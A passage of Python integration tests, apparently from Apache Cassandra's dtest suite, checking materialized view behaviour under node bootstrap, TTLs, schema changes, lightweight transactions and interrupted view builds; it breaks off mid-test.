    @jira_ticket CASSANDRA-11670
    Test that materialized views work with very wide materialized views as expected when adding a node.
    """
    session = self.prepare()

    session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    # 5 very wide partitions of 5000 rows each.
    for pk in range(5):
        for ck in range(5000):
            session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=pk, v=ck))

    self.cluster.flush()

    for pk in range(5):
        for ck in range(5000):
            assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(pk, ck), [ck, pk])

    # Bootstrap a fourth node with a small mutation size cap (CASSANDRA-11670).
    node4 = new_node(self.cluster)
    node4.set_configuration_options(values={'max_mutation_size_in_kb': 20})  # CASSANDRA-11670
    logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
    node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

    session2 = self.patient_exclusive_cql_connection(node4)

    for pk in range(5):
        for ck in range(5000):
            assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(pk, ck), [ck, pk])

    # Rewrite each partition with 100 extra rows and verify the whole range.
    for pk in range(5):
        for ck in range(5100):
            session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=pk, v=ck))
    for pk in range(5):
        for ck in range(5100):
            assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(pk, ck), [ck, pk])
@pytest.mark.resource_intensive
def test_add_write_survey_node_after_mv(self):
    """
    @jira_ticket CASSANDRA-10621
    @jira_ticket CASSANDRA-10978
    Test that materialized views work as expected when adding a node in write survey mode.
    """
    session = self.prepare()

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    for key in range(1000):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=key, v=-key))
    for key in range(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-key), [-key, key])

    # Bootstrap a node in write survey mode, then keep writing through the
    # original coordinator and verify the full key range in the view.
    node4 = new_node(self.cluster)
    node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true", "-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

    for key in range(1000, 1100):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=key, v=-key))
    for key in range(1100):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-key), [-key, key])
def test_allow_filtering(self):
    """Verify that ALLOW FILTERING behaves normally when querying a materialized view."""
    session = self.prepare()

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
    session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
                     "WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))

    for key in range(1000):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=key))
    for key in range(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {v}".format(v=key), [key, key, 'a', 3.0])

    rows = list(session.execute("SELECT * FROM t_by_v2 WHERE v2 = 'a'"))
    assert len(rows) == 1000, "Expected 1000 rows but got {}".format(len(rows))

    # Restricting a non-key view column is rejected without ALLOW FILTERING.
    assert_invalid(session, "SELECT * FROM t_by_v WHERE v = 1 AND v2 = 'a'")
    assert_invalid(session, "SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = 1")

    # With ALLOW FILTERING the same predicates are accepted on both views.
    for key in range(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {} AND v3 = 3.0 ALLOW FILTERING".format(key),
            [key, key, 'a', 3.0]
        )
        assert_one(
            session,
            "SELECT * FROM t_by_v2 WHERE v2 = 'a' AND v = {} ALLOW FILTERING".format(key),
            ['a', key, key, 3.0]
        )
def test_secondary_index(self):
    """Verify that creating a secondary index on a materialized view is rejected."""
    session = self.prepare()

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    # Index creation on the view itself must fail with the dedicated message.
    assert_invalid(session,
                   "CREATE INDEX ON t_by_v (v2)",
                   "Secondary indexes are not supported on materialized views")
def test_ttl(self):
    """
    Test that TTL works as expected for a materialized view
    @expected_result The TTL is propagated properly between tables.
    """
    session = self.prepare()

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 int, v3 int)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v2 AS SELECT * FROM t "
                     "WHERE v2 IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v2, id)"))

    # Write every row with a 10 second TTL and confirm it reaches the view.
    for key in range(100):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, {v}, {v}) USING TTL 10".format(v=key))
    for key in range(100):
        assert_one(session, "SELECT * FROM t_by_v2 WHERE v2 = {}".format(key), [key, key, key, key])

    # After the TTL has expired the view must be empty as well.
    time.sleep(20)
    remaining = list(session.execute("SELECT * FROM t_by_v2"))
    assert len(remaining) == 0, "Expected 0 rows but got {}".format(len(remaining))
def test_query_all_new_column(self):
    """
    Test that a materialized view created with a 'SELECT *' works as expected when adding a new column
    @expected_result The new column is present in the view.
    """
    session = self.prepare(user_table=True)
    self._insert_data(session)

    row_query = "SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'"
    assert_one(session, row_query, ['TX', 'user1', 1968, 'f', 'ch@ngem3a', None])

    # A column added to the base table must surface in the SELECT * view.
    session.execute("ALTER TABLE users ADD first_name varchar;")

    rows = list(session.execute(row_query))
    assert len(rows) == 1
    assert hasattr(rows[0], 'first_name'), 'Column "first_name" not found'
    assert_one(session, row_query, ['TX', 'user1', 1968, None, 'f', 'ch@ngem3a', None])
def test_query_new_column(self):
    """
    Test that a materialized view created with 'SELECT <col1, ...>' works as expected when adding a new column
    @expected_result The new column is not present in the view.
    """
    session = self.prepare(user_table=True)
    session.execute(("CREATE MATERIALIZED VIEW users_by_state2 AS SELECT state, username FROM users "
                     "WHERE STATE IS NOT NULL AND USERNAME IS NOT NULL PRIMARY KEY (state, username)"))
    self._insert_data(session)

    row_query = "SELECT * FROM users_by_state2 WHERE state = 'TX' AND username = 'user1'"
    assert_one(session, row_query, ['TX', 'user1'])

    # The view selects explicit columns, so a new base column must NOT appear.
    session.execute("ALTER TABLE users ADD first_name varchar;")

    rows = list(session.execute(row_query))
    assert len(rows) == 1
    assert not hasattr(rows[0], 'first_name'), 'Column "first_name" found in view'
    assert_one(session, row_query, ['TX', 'user1'])
def test_rename_column(self):
    """
    Test that a materialized view created with a 'SELECT *' works as expected when renaming a column
    @expected_result The column is also renamed in the view.
    """
    session = self.prepare(user_table=True)
    self._insert_data(session)

    assert_one(
        session,
        "SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
        ['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
    )

    # Renaming the base-table column must propagate to the view.
    session.execute("ALTER TABLE users RENAME username TO user")

    renamed_rows = list(session.execute("SELECT * FROM users_by_state WHERE state = 'TX' AND user = 'user1'"))
    assert len(renamed_rows) == 1
    assert hasattr(renamed_rows[0], 'user'), 'Column "user" not found'
    assert_one(
        session,
        "SELECT state, user, birth_year, gender FROM users_by_state WHERE state = 'TX' AND user = 'user1'",
        ['TX', 'user1', 1968, 'f']
    )
def test_rename_column_atomicity(self):
    """
    Test that column renaming is atomically done between a table and its materialized views
    @jira_ticket CASSANDRA-12952
    """
    session = self.prepare(nodes=1, user_table=True, install_byteman=True)
    node = self.cluster.nodelist()[0]

    self._insert_data(session)

    assert_one(
        session,
        "SELECT * FROM users_by_state WHERE state = 'TX' AND username = 'user1'",
        ['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
    )

    # Rename a column with an injected byteman rule to kill the node after the first schema update
    self.fixture_dtest_setup.allow_log_errors = True
    # The byteman script differs between the 3.x and 4.x code lines.
    script_version = '4x' if self.cluster.version() >= '4' else '3x'
    node.byteman_submit(['./byteman/merge_schema_failure_{}.btm'.format(script_version)])
    # The single node dies mid-ALTER, so the driver loses its only host.
    with pytest.raises(NoHostAvailable):
        session.execute("ALTER TABLE users RENAME username TO user")

    logger.debug('Restarting node')
    node.stop()
    node.start(wait_for_binary_proto=True)
    session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)

    # Both the table and its view should have the new schema after restart
    assert_one(
        session,
        "SELECT * FROM ks.users WHERE state = 'TX' AND user = 'user1' ALLOW FILTERING",
        ['user1', 1968, 'f', 'ch@ngem3a', None, 'TX']
    )
    assert_one(
        session,
        "SELECT * FROM ks.users_by_state WHERE state = 'TX' AND user = 'user1'",
        ['TX', 'user1', 1968, 'f', 'ch@ngem3a', None]
    )
def test_lwt(self):
    """Test that lightweight transaction behave properly with a materialized view"""
    session = self.prepare()

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Inserting initial data using IF NOT EXISTS")
    for i in range(1000):
        session.execute(
            "INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
        )
    self._replay_batchlogs()

    logger.debug("All rows should have been inserted")
    for i in range(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0]
        )

    # Bug fix: corrected the "Tyring" typo in the log message below.
    logger.debug("Trying to UpInsert data with a different value using IF NOT EXISTS")
    for i in range(1000):
        v = i * 2
        session.execute(
            "INSERT INTO t (id, v, v2, v3) VALUES ({id}, {v}, 'a', 3.0) IF NOT EXISTS".format(id=i, v=v)
        )
    self._replay_batchlogs()

    # Every id already exists, so IF NOT EXISTS must reject every re-insert.
    logger.debug("No rows should have changed")
    for i in range(1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0]
        )

    # The condition IF v < 10 matches only ids 0..9 (v == id here).
    logger.debug("Update the 10 first rows with a different value")
    for i in range(1000):
        v = i + 2000
        session.execute(
            "UPDATE t SET v={v} WHERE id = {id} IF v < 10".format(id=i, v=v)
        )
    self._replay_batchlogs()

    logger.debug("Verify that only the 10 first rows changed.")
    results = list(session.execute("SELECT * FROM t_by_v;"))
    assert len(results) == 1000
    for i in range(1000):
        v = i + 2000 if i < 10 else i
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(v),
            [v, i, 'a', 3.0]
        )

    # Only the 10 rows updated above satisfy v == id + 2000.
    logger.debug("Deleting the first 10 rows")
    for i in range(1000):
        v = i + 2000
        session.execute(
            "DELETE FROM t WHERE id = {id} IF v = {v} ".format(id=i, v=v)
        )
    self._replay_batchlogs()

    logger.debug("Verify that only the 10 first rows have been deleted.")
    results = list(session.execute("SELECT * FROM t_by_v;"))
    assert len(results) == 990
    for i in range(10, 1000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0]
        )
def test_interrupt_build_process(self):
    """Test that an interrupted MV build process is resumed as it should"""
    options = {'hinted_handoff_enabled': False}
    if self.cluster.version() >= '4':
        options['concurrent_materialized_view_builders'] = 4

    session = self.prepare(options=options, install_byteman=True)
    node1, node2, node3 = self.cluster.nodelist()

    logger.debug("Avoid premature MV build finalization with byteman")
    for node in self.cluster.nodelist():
        # The injection points moved between the 3.x and 4.0 code lines.
        if self.cluster.version() >= '4':
            node.byteman_submit(['./byteman/4.0/skip_view_build_finalization.btm'])
            node.byteman_submit(['./byteman/4.0/skip_view_build_task_finalization.btm'])
        else:
            node.byteman_submit(['./byteman/pre4.0/skip_finish_view_build_status.btm'])
            node.byteman_submit(['./byteman/pre4.0/skip_view_build_update_distributed.btm'])

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")

    logger.debug("Inserting initial data")
    for i in range(10000):
        session.execute(
            "INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i)
        )

    logger.debug("Create a MV")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
    self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)

    logger.debug("Stop the cluster. Interrupt the MV build process.")
    self.cluster.stop()

    logger.debug("Checking logs to verify that the view build tasks have been created")
    for node in self.cluster.nodelist():
        assert node.grep_log('Starting new view build', filename='debug.log')
        assert not node.grep_log('Resuming view build', filename='debug.log')
        node.mark_log(filename='debug.log')

    logger.debug("Restart the cluster")
    self.cluster.start()
    session = self.patient_cql_connection(node1)
    session.execute("USE ks")

    logger.debug("MV shouldn't be built yet.")
    # Bug fix: COUNT(*) returns exactly one row, so the previous
    # `len(list(...)) != 10000` comparison was vacuously true.
    # Compare the returned count value instead.
    assert list(session.execute("SELECT COUNT(*) FROM t_by_v"))[0][0] != 10000

    logger.debug("Wait and ensure the MV build resumed. Waiting up to 2 minutes.")
    self._wait_for_view("ks", "t_by_v")

    logger.debug("Verify all data")
    assert_one(session, "SELECT COUNT(*) FROM t_by_v", [10000])
    for i in range(10000):
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = {}".format(i),
            [i, i, 'a', 3.0],
            cl=ConsistencyLevel.ALL
        )

    logger.debug("Checking logs to verify that some view build tasks have been resumed")
    for node in self.cluster.nodelist():
        assert node.grep_log('Resuming view build', filename='debug.log')
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('4.0')
def test_drop_while_building(self):
    """Test that a parallel MV build is interrupted when the view is removed"""
    session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")

    logger.debug("Inserting initial data")
    for i in range(5000):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))

    logger.debug("Slowing down MV build with byteman")
    for node in self.cluster.nodelist():
        node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])

    logger.debug("Create a MV")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
    self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)

    logger.debug("Drop the MV while it is still building")
    session.execute("DROP MATERIALIZED VIEW t_by_v")

    logger.debug("Verify that the build has been stopped before its finalization without errors")
    for node in self.cluster.nodelist():
        self.check_logs_for_errors()
        assert not node.grep_log('Marking view', filename='debug.log')
        assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')

    logger.debug("Verify that the view has been removed")
    failed = False
    try:
        session.execute("SELECT COUNT(*) FROM t_by_v")
    except InvalidRequest:
        failed = True
    # Bug fix: this file uses pytest-style plain asserts (see the identical
    # check in test_drop_with_stopped_build); self.assertTrue is a
    # unittest.TestCase method and is not available here.
    assert failed, "The view shouldn't be queryable"
    self._assert_view_meta(session, views=1, exists=False)

    logger.debug("Create the MV again")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Verify that the MV has been successfully created")
    self._wait_for_view('ks', 't_by_v')
    assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_drop_with_stopped_build(self):
    """Test that MV whose build has been stopped with `nodetool stop` can be dropped"""
    session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    nodes = self.cluster.nodelist()

    logger.debug("Inserting initial data")
    for i in range(5000):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))

    logger.debug("Slowing down MV build with byteman")
    for node in nodes:
        # The rule keeps build tasks running long enough to be stopped below.
        node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])

    logger.debug("Create a MV")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
    self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)

    logger.debug("Stopping all running view build tasks with nodetool")
    for node in nodes:
        node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
        node.nodetool('stop VIEW_BUILD')

    logger.debug("Checking logs to verify that some view build tasks have been stopped")
    for node in nodes:
        node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
        node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
        self.check_logs_for_errors()

    logger.debug("Drop the MV while it is still building")
    session.execute("DROP MATERIALIZED VIEW t_by_v")

    logger.debug("Verify that the build has been stopped before its finalization without errors")
    for node in nodes:
        self.check_logs_for_errors()
        assert not node.grep_log('Marking view', filename='debug.log')
        assert node.grep_log('Stopping current view builder due to schema change', filename='debug.log')

    logger.debug("Verify that the view has been removed")
    failed = False
    try:
        session.execute("SELECT COUNT(*) FROM t_by_v")
    except InvalidRequest:
        # Expected: the dropped view must no longer be queryable.
        failed = True
    assert failed, "The view shouldn't be queryable"

    logger.debug("Create the MV again")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Verify that the MV has been successfully created")
    self._wait_for_view('ks', 't_by_v')
    assert_one(session, "SELECT COUNT(*) FROM t_by_v", [5000])
@since('4.0')
def test_resume_stopped_build(self):
    """Test that MV builds stopped with `nodetool stop` are resumed after restart"""
    session = self.prepare(options={'concurrent_materialized_view_builders': 4}, install_byteman=True)
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    nodes = self.cluster.nodelist()

    logger.debug("Inserting initial data")
    for i in range(5000):
        session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) IF NOT EXISTS".format(v=i))

    logger.debug("Slowing down MV build with byteman")
    for node in nodes:
        node.byteman_submit(['./byteman/4.0/view_builder_task_sleep.btm'])

    logger.debug("Create a MV")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Wait and ensure the MV build has started. Waiting up to 2 minutes.")
    self._wait_for_view_build_start(session, 'ks', 't_by_v', wait_minutes=2)

    logger.debug("Stopping all running view build tasks with nodetool")
    for node in nodes:
        node.watch_log_for('Starting new view build for range', filename='debug.log', timeout=120)
        node.nodetool('stop VIEW_BUILD')

    logger.debug("Checking logs to verify that some view build tasks have been stopped")
    for node in nodes:
        node.watch_log_for('Stopped build for view', filename='debug.log', timeout=120)
        node.watch_log_for('Compaction interrupted: View build', filename='system.log', timeout=120)
        node.watch_log_for('Interrupted build for view', filename='debug.log', timeout=120)
        assert not node.grep_log('Marking view', filename='debug.log')
        self.check_logs_for_errors()

    logger.debug("Check that MV shouldn't be built yet.")
    # Bug fix: COUNT(*) returns exactly one row, so the previous
    # `len(list(...)) != 5000` comparison was vacuously true.
    # Compare the returned count value instead.
    assert list(session.execute("SELECT COUNT(*) FROM t_by_v"))[0][0] != 5000

    logger.debug("Restart the cluster")
    self.cluster.stop()
    marks = [node.mark_log() for node in nodes]
    self.cluster.start()
    session = self.patient_cql_connection(nodes[0])

    logger.debug("Verify that the MV has been successfully created")
    self._wait_for_view('ks', 't_by_v')
    assert_one(session, "SELECT COUNT(*) FROM ks.t_by_v", [5000])

    logger.debug("Checking logs to verify that the view build has been resumed and completed after restart")
    for node, mark in zip(nodes, marks):
        assert node.grep_log('Resuming view build', filename='debug.log', from_mark=mark)
        assert node.grep_log('Marking view', filename='debug.log', from_mark=mark)
        self.check_logs_for_errors()
@since('3.0')
def test_mv_with_default_ttl_with_flush(self):
    """Exercise the default-TTL MV scenario with per-update flushes enabled."""
    flush = True
    self._test_mv_with_default_ttl(flush)
@since('3.0')
def test_mv_with_default_ttl_without_flush(self):
    """Exercise the default-TTL MV scenario purely in memtables (no flushes)."""
    flush = False
    self._test_mv_with_default_ttl(flush)
def _test_mv_with_default_ttl(self, flush):
    """
    Verify mv with default_time_to_live can be deleted properly using expired livenessInfo
    @jira_ticket CASSANDRA-14071

    :param flush: when True, flush (and occasionally compact) between updates
        so the scenario crosses sstable boundaries instead of staying in memtables.
    """
    session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
    node1, node2, node3 = self.cluster.nodelist()
    session.execute('USE ks')
    logger.debug("MV with same key and unselected columns")
    # 'c' exists in the base table but is NOT selected by mv2
    session.execute("CREATE TABLE t2 (k int, a int, b int, c int, primary key(k, a)) with default_time_to_live=600")
    session.execute(("CREATE MATERIALIZED VIEW mv2 AS SELECT k,a,b FROM t2 "
                     "WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (a, k)"))
    session.cluster.control_connection.wait_for_schema_agreement()
    # writing only the unselected column should still create a live view row
    self.update_view(session, "UPDATE t2 SET c=1 WHERE k=1 AND a=1;", flush)
    assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 1])
    assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])
    # nulling the only live (unselected) column removes base and view rows
    self.update_view(session, "UPDATE t2 SET c=null WHERE k=1 AND a=1;", flush)
    assert_none(session, "SELECT k,a,b,c FROM t2")
    assert_none(session, "SELECT k,a,b FROM mv2")
    # re-setting the unselected column resurrects the view row
    self.update_view(session, "UPDATE t2 SET c=2 WHERE k=1 AND a=1;", flush)
    assert_one(session, "SELECT k,a,b,c FROM t2", [1, 1, None, 2])
    assert_one(session, "SELECT k,a,b FROM mv2", [1, 1, None])
    # a cell delete of the unselected column behaves like setting it to null
    self.update_view(session, "DELETE c FROM t2 WHERE k=1 AND a=1;", flush)
    assert_none(session, "SELECT k,a,b,c FROM t2")
    assert_none(session, "SELECT k,a,b FROM mv2")
    if flush:
        # compaction must not resurrect the deleted rows
        self.cluster.compact()
        assert_none(session, "SELECT * FROM t2")
        assert_none(session, "SELECT * FROM mv2")
    # test with user-provided ttl
    self.update_view(session, "INSERT INTO t2(k,a,b,c) VALUES(2,2,2,2) USING TTL 5", flush)
    self.update_view(session, "UPDATE t2 USING TTL 100 SET c=1 WHERE k=2 AND a=2;", flush)
    self.update_view(session, "UPDATE t2 USING TTL 50 SET c=2 WHERE k=2 AND a=2;", flush)
    self.update_view(session, "DELETE c FROM t2 WHERE k=2 AND a=2;", flush)
    # wait out the 5-second TTL of the original insert's livenessInfo
    time.sleep(5)
    assert_none(session, "SELECT k,a,b,c FROM t2")
    assert_none(session, "SELECT k,a,b FROM mv2")
    if flush:
        self.cluster.compact()
        assert_none(session, "SELECT * FROM t2")
        assert_none(session, "SELECT * FROM mv2")
    logger.debug("MV with extra key")
    # here 'a' is a regular base column promoted into the view's primary key,
    # so every change of 'a' must shadow the previous view row
    session.execute("CREATE TABLE t (k int PRIMARY KEY, a int, b int) with default_time_to_live=600")
    session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT * FROM t "
                     "WHERE k IS NOT NULL AND a IS NOT NULL PRIMARY KEY (k, a)"))
    session.cluster.control_connection.wait_for_schema_agreement()
    self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 1, 1);", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, 1])
    assert_one(session, "SELECT * FROM mv", [1, 1, 1])
    self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 2, 1);", flush)
    assert_one(session, "SELECT * FROM t", [1, 2, 1])
    assert_one(session, "SELECT * FROM mv", [1, 2, 1])
    self.update_view(session, "INSERT INTO t (k, a, b) VALUES (1, 3, 1);", flush)
    assert_one(session, "SELECT * FROM t", [1, 3, 1])
    assert_one(session, "SELECT * FROM mv", [1, 3, 1])
    if flush:
        self.cluster.compact()
        assert_one(session, "SELECT * FROM t", [1, 3, 1])
        assert_one(session, "SELECT * FROM mv", [1, 3, 1])
    # user provided ttl
    self.update_view(session, "UPDATE t USING TTL 50 SET a = 4 WHERE k = 1", flush)
    assert_one(session, "SELECT * FROM t", [1, 4, 1])
    assert_one(session, "SELECT * FROM mv", [1, 4, 1])
    self.update_view(session, "UPDATE t USING TTL 40 SET a = 5 WHERE k = 1", flush)
    assert_one(session, "SELECT * FROM t", [1, 5, 1])
    assert_one(session, "SELECT * FROM mv", [1, 5, 1])
    self.update_view(session, "UPDATE t USING TTL 30 SET a = 6 WHERE k = 1", flush)
    assert_one(session, "SELECT * FROM t", [1, 6, 1])
    assert_one(session, "SELECT * FROM mv", [1, 6, 1])
    if flush:
        self.cluster.compact()
        assert_one(session, "SELECT * FROM t", [1, 6, 1])
        assert_one(session, "SELECT * FROM mv", [1, 6, 1])
@flaky
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_with_flush(self):
    """Run the no-base-column-in-view-PK timestamp scenario with flushes."""
    self._test_no_base_column_in_view_pk_complex_timestamp(flush=True)
@pytest.mark.skip(reason="Frequently fails in CI. Skipping until fixed as tracked by CASSANDRA-14148")
@since('3.0')
def test_no_base_column_in_view_pk_complex_timestamp_without_flush(self):
    """Run the no-base-column-in-view-PK timestamp scenario without flushes."""
    self._test_no_base_column_in_view_pk_complex_timestamp(flush=False)
def _test_no_base_column_in_view_pk_complex_timestamp(self, flush):
    """
    Able to shadow old view row if all columns in base are removed including unselected
    Able to recreate view row if at least one selected column alive
    @jira_ticket CASSANDRA-11500

    :param flush: when True, flush between updates so each write lands in its
        own sstable.
    """
    session = self.prepare(rf=3, nodes=3, options={'hinted_handoff_enabled': False}, consistency_level=ConsistencyLevel.QUORUM)
    node1, node2, node3 = self.cluster.nodelist()
    session.execute('USE ks')
    # e and f are "unselected": present in the base table but not in the view
    session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")
    session.execute(("CREATE MATERIALIZED VIEW mv AS SELECT k,c,a,b FROM t "
                     "WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c, k)"))
    session.cluster.control_connection.wait_for_schema_agreement()
    # update unselected, view row should be alive
    self.update_view(session, "UPDATE t USING TIMESTAMP 1 SET e=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, None, None, 1, None])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
    # remove unselected, add selected column, view row should be alive
    self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, None, 1, None, None])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, 1])
    # remove selected column, view row is removed
    self.update_view(session, "UPDATE t USING TIMESTAMP 2 SET e=null, b=null WHERE k=1 AND c=1;", flush)
    assert_none(session, "SELECT * FROM t")
    assert_none(session, "SELECT * FROM mv")
    # update unselected with ts=3, view row should be alive
    self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
    # insert livenesssInfo, view row should be alive
    self.update_view(session, "INSERT INTO t(k,c) VALUES(1,1) USING TIMESTAMP 3", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, 1])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
    # remove unselected, view row should be alive because of base livenessInfo alive
    self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET f=null WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, None, None, None, None])
    assert_one(session, "SELECT * FROM mv", [1, 1, None, None])
    # add selected column, view row should be alive
    self.update_view(session, "UPDATE t USING TIMESTAMP 3 SET a=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, None])
    assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
    # update unselected, view row should be alive
    self.update_view(session, "UPDATE t USING TIMESTAMP 4 SET f=1 WHERE k=1 AND c=1;", flush)
    assert_one(session, "SELECT * FROM t", [1, 1, 1, None, None, 1])
    assert_one(session, "SELECT * FROM mv", [1, 1, 1, None])
    # delete with ts=3, view row should be alive due to unselected@ts4
    self.update_view(session, "DELETE FROM t USING TIMESTAMP 3 WHERE k=1 AND c=1;", flush)
